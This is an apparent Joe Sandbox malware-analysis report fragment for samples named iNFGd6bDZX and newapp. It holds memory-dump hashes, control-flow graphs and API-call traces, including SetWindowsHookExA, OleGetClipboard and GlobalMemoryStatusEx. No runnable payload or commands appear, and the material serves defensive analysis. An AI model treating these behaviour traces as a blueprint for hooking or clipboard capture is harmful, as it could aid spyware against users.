                                                                                                                • Instruction ID: 26dc76bfe4d2f642c2a179958d36b616af79a8c90f67b3bd2a01b773ccc377a4
                                                                                                                • Opcode Fuzzy Hash: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                                                                • Instruction Fuzzy Hash: 0311BB75904280CFDB12DF68D9C4B15BFA1FB84314F28C6AAD8494B796C33AD44ACB62
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2959283386.0000000006EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EB0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_6eb0000_iNFGd6bDZX.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 539c64ac16f5df66eb6f551f48c1d9b45430814b508079b9645ffb890786a1d1
                                                                                                                • Instruction ID: 5159d5ad52fe70d0ab0dd2e9a5865ef945f89d85ad64a52737fa9eddcb8dd415
                                                                                                                • Opcode Fuzzy Hash: 539c64ac16f5df66eb6f551f48c1d9b45430814b508079b9645ffb890786a1d1
                                                                                                                • Instruction Fuzzy Hash: 7B11CFB1D01259AFCB00DF9AD885ACEFBB4FB48324F10812AE918A7200C374A954CFA5
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2921821057.00000000016DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 016DD000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_16dd000_iNFGd6bDZX.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: e676ac0fa395c9d78ad1373b251d500d35a058fc48d93c8ca3093ca1b2890539
                                                                                                                • Instruction ID: af57c9ba3126b590aa076137ac9227d5feecc70828be33c712be32bd829e3c75
                                                                                                                • Opcode Fuzzy Hash: e676ac0fa395c9d78ad1373b251d500d35a058fc48d93c8ca3093ca1b2890539
                                                                                                                • Instruction Fuzzy Hash: 8E11BB75904280CFDB06DF68C9C4B15BFA2FB84218F24C6A9D8494B792C33AD44ACB52
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2959283386.0000000006EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EB0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_6eb0000_iNFGd6bDZX.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 43ba3cdb97325388fdcb8da959d3620fb39557051dcfa21249841befa379b53c
                                                                                                                • Instruction ID: 150b9ad3582a1415440016bd040e50a7bc3c782331b6373ae23b16a879b4a2ae
                                                                                                                • Opcode Fuzzy Hash: 43ba3cdb97325388fdcb8da959d3620fb39557051dcfa21249841befa379b53c
                                                                                                                • Instruction Fuzzy Hash: D201D131B002114BDB60996DA80876FF3DBEBC9B14F18A43AE10EC7385EE25DC024395
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2959283386.0000000006EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EB0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_6eb0000_iNFGd6bDZX.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: cd9978dcd2090dda778ae2b3246d3945e2ee7f6cf1588ae9d8f482e780c6880d
                                                                                                                • Instruction ID: f41fabe88df483c89a3ccaa9cf5c249d3f4d0b853f4b763ee8035d6d5192a917
                                                                                                                • Opcode Fuzzy Hash: cd9978dcd2090dda778ae2b3246d3945e2ee7f6cf1588ae9d8f482e780c6880d
                                                                                                                • Instruction Fuzzy Hash: 2E018C35B102115BCB65957DA864B6FB2DADBC9628F10A83AE20AC7344EE25DD02439A
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2959283386.0000000006EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EB0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_6eb0000_iNFGd6bDZX.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 12553634c3d2f19355257d4cd03266f4a2931b74f8eabb28f48010ea991eba54
                                                                                                                • Instruction ID: ba57efa2251d609c0fad1ee056b7bd10792887c17cfc9f81a7eea92bb6d2d4ed
                                                                                                                • Opcode Fuzzy Hash: 12553634c3d2f19355257d4cd03266f4a2931b74f8eabb28f48010ea991eba54
                                                                                                                • Instruction Fuzzy Hash: D1018130B102115FCB649A6CE45876FB3DAE789718F10A439E60AC7390DE2ADC028795
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2959283386.0000000006EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EB0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_6eb0000_iNFGd6bDZX.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: $^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
                                                                                                                • API String ID: 0-2222239885
                                                                                                                • Opcode ID: b6fade87e958d34f7dec281fef31795414ef6f74cf956af31ce05de6e0d6ba8a
                                                                                                                • Instruction ID: 945f262ae684ec1b54eeda40c2fbfb04428c31fb40aa5e3aefad560e26d79bef
                                                                                                                • Opcode Fuzzy Hash: b6fade87e958d34f7dec281fef31795414ef6f74cf956af31ce05de6e0d6ba8a
                                                                                                                • Instruction Fuzzy Hash: 83123D30E002198FDF64DF65D944AAEB7B6BFC8304F20A569D40AAB754DB309D85CF81
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2959283386.0000000006EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EB0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_6eb0000_iNFGd6bDZX.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: $^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
                                                                                                                • API String ID: 0-3823777903
                                                                                                                • Opcode ID: bd9a7e1fe2edd1d3e23eb3941a85c90aacc5f8c3671a9da1441483cdb125a5a2
                                                                                                                • Instruction ID: 9165dc6e5266d38548196d292e5815888a5f65e51fc5065ed95b166037e10fd0
                                                                                                                • Opcode Fuzzy Hash: bd9a7e1fe2edd1d3e23eb3941a85c90aacc5f8c3671a9da1441483cdb125a5a2
                                                                                                                • Instruction Fuzzy Hash: FD915B30A003099FEF68DB68D984BAFB7B6EF84304F10A539E8169B254DB759C45CB90
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2959283386.0000000006EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EB0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_6eb0000_iNFGd6bDZX.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: .5vq$$^q$$^q$$^q$$^q$$^q$$^q
                                                                                                                • API String ID: 0-390881366
                                                                                                                • Opcode ID: cead9e27b1812665fc965918f854b009c64b82efdb9c305051febd9dfbe202d6
                                                                                                                • Instruction ID: 43322d8f6330c268520313ab2e6b44c41f9ebfa799171dbca04863fea6312092
                                                                                                                • Opcode Fuzzy Hash: cead9e27b1812665fc965918f854b009c64b82efdb9c305051febd9dfbe202d6
                                                                                                                • Instruction Fuzzy Hash: 81F14F30A00209DFDB54DFA8D594AAEB7B6FFC8304F249569D4069B3A8DB35DC42CB91
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2959283386.0000000006EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EB0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_6eb0000_iNFGd6bDZX.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: $^q$$^q$$^q$$^q
                                                                                                                • API String ID: 0-2125118731
                                                                                                                • Opcode ID: 624fb80d712b3d240a6f323f0500cce3ec44b1cfda1aadca17052dcfb6e4053c
                                                                                                                • Instruction ID: 8ee21f260848519fd8d9619b2036c6f0d7ea2c22f180e05974f448b46a3d659b
                                                                                                                • Opcode Fuzzy Hash: 624fb80d712b3d240a6f323f0500cce3ec44b1cfda1aadca17052dcfb6e4053c
                                                                                                                • Instruction Fuzzy Hash: 58B13D30E102098FDB54DF68D5946AFB7BAFF88304F24A529D4069B394DB75DC82CB90
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2959283386.0000000006EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EB0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_6eb0000_iNFGd6bDZX.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: LR^q$LR^q$$^q$$^q
                                                                                                                • API String ID: 0-2454687669
                                                                                                                • Opcode ID: ceab3855edfc4c2b77c2b0ca4c3b52727965fbd085de020fdde8e0955c5c94ca
                                                                                                                • Instruction ID: 40ca71ae74d775be5a93bd42d40c64cf1bce0ef6b9597838c60f44768be8c6c3
                                                                                                                • Opcode Fuzzy Hash: ceab3855edfc4c2b77c2b0ca4c3b52727965fbd085de020fdde8e0955c5c94ca
                                                                                                                • Instruction Fuzzy Hash: 7651C230B002019FDB54DB28D940ABFB7AAFB88704F14A569D4069B394DB35EC45CB51
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2959283386.0000000006EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EB0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_6eb0000_iNFGd6bDZX.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: $^q$$^q$$^q$$^q
                                                                                                                • API String ID: 0-2125118731
                                                                                                                • Opcode ID: 61838deffafac3fb8803c387067f54403e2d553da0ab42d6e255221c7a83f2ae
                                                                                                                • Instruction ID: 151fd2be1ae73bb128596d1c14a080a532c7b7f3d2d7713d68a50b7d2ce449ee
                                                                                                                • Opcode Fuzzy Hash: 61838deffafac3fb8803c387067f54403e2d553da0ab42d6e255221c7a83f2ae
                                                                                                                • Instruction Fuzzy Hash: 6A516C30A103059FDF65DB6CE5806EEB3B6EB88314F24A539D406AB354DB35EC86CB91

                                                                                                                Execution Graph

                                                                                                                Execution Coverage:9.5%
                                                                                                                Dynamic/Decrypted Code Coverage:100%
                                                                                                                Signature Coverage:0%
                                                                                                                Total number of Nodes:18
                                                                                                                Total number of Limit Nodes:2
                                                                                                                execution_graph 10803 16478f0 10804 16478fb 10803->10804 10806 1647e38 10803->10806 10807 1647e5d 10806->10807 10811 1647f48 10807->10811 10815 1647f39 10807->10815 10813 1647f6f 10811->10813 10812 164804c 10812->10812 10813->10812 10819 1647b5c 10813->10819 10817 1647f48 10815->10817 10816 164804c 10816->10816 10817->10816 10818 1647b5c CreateActCtxA 10817->10818 10818->10816 10820 1648fd8 CreateActCtxA 10819->10820 10822 164909b 10820->10822 10823 164e778 10824 164e7c0 GetModuleHandleW 10823->10824 10825 164e7ba 10823->10825 10826 164e7ed 10824->10826 10825->10824

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 635 1648fcc-1648fd6 636 1648fd8-1649099 CreateActCtxA 635->636 638 16490a2-16490fc 636->638 639 164909b-16490a1 636->639 646 16490fe-1649101 638->646 647 164910b-164910f 638->647 639->638 646->647 648 1649120 647->648 649 1649111-164911d 647->649 651 1649121 648->651 649->648 651->651
                                                                                                                APIs
                                                                                                                • CreateActCtxA.KERNEL32(?), ref: 01649089
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.1835213350.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_1640000_newapp.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Create
                                                                                                                • String ID:
                                                                                                                • API String ID: 2289755597-0
                                                                                                                • Opcode ID: 4c39ace32d4dbbc46ce74e03f505fb18fe64647bd1e2f89472e789597152ed73
                                                                                                                • Instruction ID: a474cc7120bcb7d8841fa864df6b932f864c00cb8a403b3e6573d7009852f8f5
                                                                                                                • Opcode Fuzzy Hash: 4c39ace32d4dbbc46ce74e03f505fb18fe64647bd1e2f89472e789597152ed73
                                                                                                                • Instruction Fuzzy Hash: A341D1B0C40619CFDB24DFA9C884BDEBBB5BF49304F24816AD408AB255DB756986CF90

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 652 1647b5c-1649099 CreateActCtxA 655 16490a2-16490fc 652->655 656 164909b-16490a1 652->656 663 16490fe-1649101 655->663 664 164910b-164910f 655->664 656->655 663->664 665 1649120 664->665 666 1649111-164911d 664->666 668 1649121 665->668 666->665 668->668
                                                                                                                APIs
                                                                                                                • CreateActCtxA.KERNEL32(?), ref: 01649089
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.1835213350.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_1640000_newapp.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Create
                                                                                                                • String ID:
                                                                                                                • API String ID: 2289755597-0
                                                                                                                • Opcode ID: a931fd656b0e6dcaa527ff3a77274b93e1e9078e0f6936c106c5dcc22e6ac37d
                                                                                                                • Instruction ID: 0c30639955a502b7d4635404f8717a81d5a69e62a60f9949d0dc085f3ec81f29
                                                                                                                • Opcode Fuzzy Hash: a931fd656b0e6dcaa527ff3a77274b93e1e9078e0f6936c106c5dcc22e6ac37d
                                                                                                                • Instruction Fuzzy Hash: B541DFB0D00619CFDB24DFA9C844B9EBBB5BF49304F24816AD408AB255DB756986CF90

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 669 164e778-164e7b8 670 164e7c0-164e7eb GetModuleHandleW 669->670 671 164e7ba-164e7bd 669->671 672 164e7f4-164e808 670->672 673 164e7ed-164e7f3 670->673 671->670 673->672
                                                                                                                APIs
                                                                                                                • GetModuleHandleW.KERNELBASE(00000000), ref: 0164E7DE
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.1835213350.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_1640000_newapp.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: HandleModule
                                                                                                                • String ID:
                                                                                                                • API String ID: 4139908857-0
                                                                                                                • Opcode ID: d012be476633ff278cb0470cb6979a3c53bb02738b54593cb539ef06c210feb6
                                                                                                                • Instruction ID: 4a0c94007702f34b9f4c91fe0c7482da6abe79b28eac705da2629884920ab955
                                                                                                                • Opcode Fuzzy Hash: d012be476633ff278cb0470cb6979a3c53bb02738b54593cb539ef06c210feb6
                                                                                                                • Instruction Fuzzy Hash: 751110B5C002498FDB10CF9AC844BDEFBF5EB88324F10842AD568A7210D379A545CFA1
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.1834801976.000000000146D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0146D000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_146d000_newapp.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 188726264d1539a636d32131ca2a55398ca4ae7121dfd17b5b86599d336b67c7
                                                                                                                • Instruction ID: 0d2415e5136f36810c9d260bfadd52768b06a3a318d81cfc6f2424f50772ea86
                                                                                                                • Opcode Fuzzy Hash: 188726264d1539a636d32131ca2a55398ca4ae7121dfd17b5b86599d336b67c7
                                                                                                                • Instruction Fuzzy Hash: 0E214871A00244DFDB05DF48C9C0B57BF69FB98318F20C17AD9494B36AC336E846CAA2
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.1834845841.000000000147D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0147D000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_147d000_newapp.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: aacb61806b1f1a46ad4312b4198dec8e521bf6c7ce9860aca8f36eb4a3573d49
                                                                                                                • Instruction ID: 305fad05e8d2f510605d004ce62b7cc197801c666c653d48cb3e873a3b3983c0
                                                                                                                • Opcode Fuzzy Hash: aacb61806b1f1a46ad4312b4198dec8e521bf6c7ce9860aca8f36eb4a3573d49
                                                                                                                • Instruction Fuzzy Hash: 852125B1904280DFCB16DF58D984B56BFA5EF84318F20C56ED90A4B366C336D447CA61
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.1834845841.000000000147D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0147D000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_147d000_newapp.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: b96c3d8d28fe2b6f5c3fafba7cec694e4447a0cab58f64c060e179e99aec9a10
                                                                                                                • Instruction ID: 5bdf06acd6d7ee79e886642930ae8d0e3cd07070ecdd6f493181d98ef05e3b62
                                                                                                                • Opcode Fuzzy Hash: b96c3d8d28fe2b6f5c3fafba7cec694e4447a0cab58f64c060e179e99aec9a10
                                                                                                                • Instruction Fuzzy Hash: C3216D755093C08FDB03CF24D994756BF71EF46218F28C5DAD8498B6A7C33A980ACB62
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.1834801976.000000000146D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0146D000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_146d000_newapp.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                                                                                • Instruction ID: 93b95ed2d570e15665a5c53231f17a3febac1ab786e8f824732bb88a53edc4f1
                                                                                                                • Opcode Fuzzy Hash: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                                                                                • Instruction Fuzzy Hash: B011D272904240CFDB02CF44D5C4B56BF71FB94314F24C2AAD9490B266C33AD456CB92
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.1834801976.000000000146D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0146D000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_146d000_newapp.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 31c6b48650ff5f4ca01b1ca8b814a97e730fa4434d247c5a414c44d4854bde60
                                                                                                                • Instruction ID: 4afb7fa142440b09c3baaed94becb9d629abcdc1fc1f3d7455978678587b1bf3
                                                                                                                • Opcode Fuzzy Hash: 31c6b48650ff5f4ca01b1ca8b814a97e730fa4434d247c5a414c44d4854bde60
                                                                                                                • Instruction Fuzzy Hash: C401FC31A043849AE7104A69CD84767BFDCDF40329F18C437ED484A266C23C9840C6B3
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.1834801976.000000000146D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0146D000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_146d000_newapp.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: d72a066c37a6f6f69e52ea1d0906f2d75266d01cd4709d9d21d3d68160c7471f
                                                                                                                • Instruction ID: 7e2ba252c59b0125938a4caf33dbb7370f21948eba299431f96cf94530a19da7
                                                                                                                • Opcode Fuzzy Hash: d72a066c37a6f6f69e52ea1d0906f2d75266d01cd4709d9d21d3d68160c7471f
                                                                                                                • Instruction Fuzzy Hash: 11F0C2715043849EE7108A1AC884B63FFECEB80339F18C46AED480E296C2799840CAB2

                                                                                                                Execution Graph

                                                                                                                Execution Coverage:14.6%
                                                                                                                Dynamic/Decrypted Code Coverage:100%
                                                                                                                Signature Coverage:0%
                                                                                                                Total number of Nodes:156
                                                                                                                Total number of Limit Nodes:18
                                                                                                                execution_graph 37693 28c0848 37695 28c084e 37693->37695 37694 28c091b 37695->37694 37697 28c1340 37695->37697 37698 28c12ed 37697->37698 37703 28c134f 37697->37703 37698->37695 37699 28c1454 37699->37695 37703->37699 37704 28c80f9 37703->37704 37709 6663ac8 37703->37709 37715 6663ab8 37703->37715 37705 28c8103 37704->37705 37706 28c81b9 37705->37706 37721 667fa60 37705->37721 37725 667fa50 37705->37725 37706->37703 37710 6663ada 37709->37710 37713 6663b8b 37710->37713 37729 6663824 37710->37729 37712 6663b51 37734 6663844 37712->37734 37713->37703 37716 6663ac5 37715->37716 37717 6663824 3 API calls 37716->37717 37719 6663b8b 37716->37719 37718 6663b51 37717->37718 37720 6663844 KiUserCallbackDispatcher 37718->37720 37719->37703 37720->37719 37723 667fa75 37721->37723 37722 667fc8a 37722->37706 37723->37722 37724 667fca0 GlobalMemoryStatusEx GlobalMemoryStatusEx 37723->37724 37724->37723 37727 667fa75 37725->37727 37726 667fc8a 37726->37706 37727->37726 37728 667fca0 GlobalMemoryStatusEx GlobalMemoryStatusEx 37727->37728 37728->37727 37730 666382f 37729->37730 37738 6664c80 37730->37738 37744 6664c6b 37730->37744 37731 6663d2a 37731->37712 37735 666384f 37734->37735 37737 666babb 37735->37737 37785 666b2b4 37735->37785 37737->37713 37739 6664cab 37738->37739 37750 66651f0 37739->37750 37740 6664d2e 37741 6663ffc GetModuleHandleW 37740->37741 37742 6664d5a 37740->37742 37741->37742 37745 6664c78 37744->37745 37749 66651f0 3 API calls 37745->37749 37746 6664d2e 37747 6663ffc GetModuleHandleW 37746->37747 37748 6664d5a 37746->37748 37747->37748 37749->37746 37751 66651f4 37750->37751 37752 66652ae 37751->37752 37755 6665360 37751->37755 37768 6665370 37751->37768 37756 6665364 37755->37756 37758 66653a9 37756->37758 37781 6663ffc 37756->37781 37759 6663ffc GetModuleHandleW 37758->37759 37767 6665574 37758->37767 37760 66654fa 37759->37760 37761 66655cf 37760->37761 37763 6663ffc GetModuleHandleW 37760->37763 37760->37767 37761->37752 37762 66656f9 GetModuleHandleW 37764 6665725 37762->37764 37765 6665548 37763->37765 37764->37752 37766 6663ffc GetModuleHandleW 37765->37766 37765->37767 37766->37767 37767->37761 37767->37762 37769 6665372 37768->37769 37770 6663ffc GetModuleHandleW 37769->37770 37772 66653a9 37769->37772 37770->37772 37771 6665574 37775 66655cf 37771->37775 37776 66656f9 GetModuleHandleW 37771->37776 37772->37771 37773 6663ffc GetModuleHandleW 37772->37773 37774 66654fa 37773->37774 37774->37771 37774->37775 37777 6663ffc GetModuleHandleW 37774->37777 37775->37752 37778 6665725 37776->37778 37779 6665548 37777->37779 37778->37752 37779->37771 37780 6663ffc GetModuleHandleW 37779->37780 37780->37771 37782 66656b0 GetModuleHandleW 37781->37782 37784 6665725 37782->37784 37784->37758 37786 666bad0 KiUserCallbackDispatcher 37785->37786 37788 666bb3e 37786->37788 37788->37735 37789 666c0e0 37790 666c13a OleGetClipboard 37789->37790 37791 666c17a 37790->37791 37791->37791 37874 666a4f0 DuplicateHandle 37875 666a586 37874->37875 37792 d9d030 37793 d9d048 37792->37793 37794 d9d0a2 37793->37794 37801 6664124 37793->37801 37805 666690b 37793->37805 37811 666b0f0 37793->37811 37819 6666a30 37793->37819 37823 6666910 37793->37823 37829 6664134 37793->37829 37802 666412f 37801->37802 37837 666415c 37802->37837 37804 6666a47 37804->37794 37810 6666936 37805->37810 37806 6664124 GetModuleHandleW 37807 6666942 37806->37807 37808 6664134 CallWindowProcW 37807->37808 37809 6666957 37808->37809 37809->37794 37810->37806 37813 666b100 37811->37813 37812 666b161 37849 666a274 37812->37849 37813->37812 37815 666b151 37813->37815 37841 666b650 37815->37841 37845 666b690 37815->37845 37816 666b15f 37816->37816 37820 6666a34 37819->37820 37821 666415c GetModuleHandleW 37820->37821 37822 6666a47 37821->37822 37822->37794 37828 6666936 37823->37828 37824 6664124 GetModuleHandleW 37825 6666942 37824->37825 37826 6664134 CallWindowProcW 37825->37826 37827 6666957 37826->37827 37827->37794 37828->37824 37830 666413f 37829->37830 37831 666b161 37830->37831 37833 666b151 37830->37833 37832 666a274 CallWindowProcW 37831->37832 37834 666b15f 37832->37834 37835 666b650 CallWindowProcW 37833->37835 37836 666b690 CallWindowProcW 37833->37836 37834->37834 37835->37834 37836->37834 37838 6664167 37837->37838 37839 6663ffc GetModuleHandleW 37838->37839 37840 6666b17 37838->37840 37839->37840 37843 666b655 37841->37843 37842 666a274 CallWindowProcW 37842->37843 37843->37842 37844 666b77a 37843->37844 37844->37816 37846 666b69e 37845->37846 37847 666a274 CallWindowProcW 37846->37847 37848 666b77a 37846->37848 37847->37846 37848->37816 37850 666a27f 37849->37850 37851 666b82a CallWindowProcW 37850->37851 37852 666b7d9 37850->37852 37851->37852 37852->37816 37853 666dea8 37854 666deec SetWindowsHookExA 37853->37854 37856 666df32 37854->37856 37857 666a2a8 37858 666a2a9 GetCurrentProcess 37857->37858 37860 666a340 GetCurrentThread 37858->37860 37861 666a339 37858->37861 37862 666a376 37860->37862 37863 666a37d GetCurrentProcess 37860->37863 37861->37860 37862->37863 37864 666a3b3 37863->37864 37865 666a3db GetCurrentThreadId 37864->37865 37866 666a40c 37865->37866 37867 666bf48 37868 666bf53 37867->37868 37870 666bf63 37868->37870 37871 666b4ec 37868->37871 37872 666bf98 OleInitialize 37871->37872 37873 666bffc 37872->37873 37873->37870 37876 6666758 37877 666675a CreateWindowExW 37876->37877 37879 666687c 37877->37879

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 124 6673570-6673591 125 6673593-6673596 124->125 126 66735bc-66735bf 125->126 127 6673598-66735b7 125->127 128 66735c5-66735e4 126->128 129 6673d60-6673d62 126->129 127->126 137 66735e6-66735e9 128->137 138 66735fd-6673607 128->138 131 6673d64 129->131 132 6673d69-6673d6c 129->132 131->132 132->125 134 6673d72-6673d7b 132->134 137->138 139 66735eb-66735fb 137->139 141 667360d-667361e call 667315c 138->141 139->141 144 6673623-6673628 141->144 145 6673635-6673912 144->145 146 667362a-6673630 144->146 167 6673d52-6673d5f 145->167 168 6673918-66739c7 145->168 146->134 177 66739f0 168->177 178 66739c9-66739ee 168->178 180 66739f9-6673a0c call 6673168 177->180 178->180 183 6673a12-6673a34 call 6673174 180->183 184 6673d39-6673d45 180->184 183->184 188 6673a3a-6673a44 183->188 184->168 185 6673d4b 184->185 185->167 188->184 189 6673a4a-6673a55 188->189 189->184 190 6673a5b-6673b31 189->190 202 6673b33-6673b35 190->202 203 6673b3f-6673b6f 190->203 202->203 207 6673b71-6673b73 203->207 208 6673b7d-6673b89 203->208 207->208 209 6673b8b-6673b8f 208->209 210 6673be9-6673bed 208->210 209->210 213 6673b91-6673bbb 209->213 211 6673bf3-6673c2f 210->211 212 6673d2a-6673d33 210->212 224 6673c31-6673c33 211->224 225 6673c3d-6673c4b 211->225 212->184 212->190 220 6673bbd-6673bbf 213->220 221 6673bc9-6673be6 call 6673180 213->221 220->221 221->210 224->225 228 6673c62-6673c6d 225->228 229 6673c4d-6673c58 225->229 232 6673c85-6673c96 228->232 233 6673c6f-6673c75 228->233 229->228 234 6673c5a 229->234 238 6673cae-6673cba 232->238 239 6673c98-6673c9e 232->239 235 6673c77 233->235 236 6673c79-6673c7b 233->236 234->228 235->232 236->232 243 6673cd2-6673d23 238->243 244 6673cbc-6673cc2 238->244 240 6673ca2-6673ca4 239->240 241 6673ca0 239->241 240->238 241->238 243->212 245 6673cc6-6673cc8 244->245 246 6673cc4 244->246 245->243 246->243
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.2958449677.0000000006670000.00000040.00000800.00020000.00000000.sdmp, Offset: 06670000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_6670000_newapp.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: $^q$$^q$$^q$$^q$$^q$$^q
                                                                                                                • API String ID: 0-2392861976
